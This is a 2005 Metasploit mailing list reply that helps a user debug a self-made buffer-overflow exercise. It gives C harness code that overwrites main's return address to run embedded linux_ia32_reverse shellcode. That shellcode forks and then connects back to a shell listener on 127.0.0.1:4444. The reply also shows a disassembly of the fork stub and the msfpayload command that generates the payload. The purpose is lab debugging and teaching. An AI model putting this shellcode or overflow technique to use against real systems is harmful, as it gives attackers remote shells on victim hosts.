Metasploit mailing list archives
Can't seem to get a shell prompt from linux_ia32_reverse
From: mmiller at hick.org (mmiller at hick.org)
Date: Tue, 5 Apr 2005 17:18:29 -0500
On Tue, Apr 05, 2005 at 04:46:25PM -0400, John Wasser wrote:
As an exercise I created a CGI application (Apache under Fedora Core 3 Linux) with a buffer overflow vulnerability and a Metasploit exploit for it. The exploit works and the payload executes but when I use the linux_ia32_reverse payload I don't get a shell prompt. The Reverse Handler gets the connection but no prompt: Any suggestions?
I believe the fork code you added to PrependPayload must have had an error. Take the following sample code that simulates an exploit:

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>   /* memcpy */

    /* linux_ia32_reverse payload with a fork/exit stub prepended */
    char sc[] =
        "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80"
        "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
        "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68"
        "\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
        "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
        "\x89\xe1\xb0\x0b\xcd\x80";

    int main()
    {
        char buf[8];

        /* Overwrite main's saved return address with the address of the
           shellcode, which is copied in right after the return address. */
        *(unsigned int *)(buf + 12) = (unsigned int)(buf + 16);
        memcpy(buf + 16, sc, sizeof(sc) - 1);

        return 1;
    }

All this code does is overwrite the return address of main with the address of the start of the shellcode (which comes immediately after the return address). The first line of the shellcode is a simple unoptimized fork/exit:

    00000000  6A02    push byte +0x2
    00000002  58      pop eax
    00000003  CD80    int 0x80
    00000005  85C0    test eax,eax
    00000007  7405    jz 0xe
    00000009  6A01    push byte +0x1
    0000000B  58      pop eax
    0000000C  CD80    int 0x80

The shellcode then runs in the context of the child process and the parent process simply exits. When you request the above code as a CGI, the page returns an internal server error (as expected), but you receive a shell on 127.0.0.1:4444. The payload was generated using:

    $ ./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 P

If you're curious as to why you receive a connection but do not receive a shell from within the context of the CGI itself, you can strace the CGI process (add an artificial delay for testing purposes) to see where it's dying.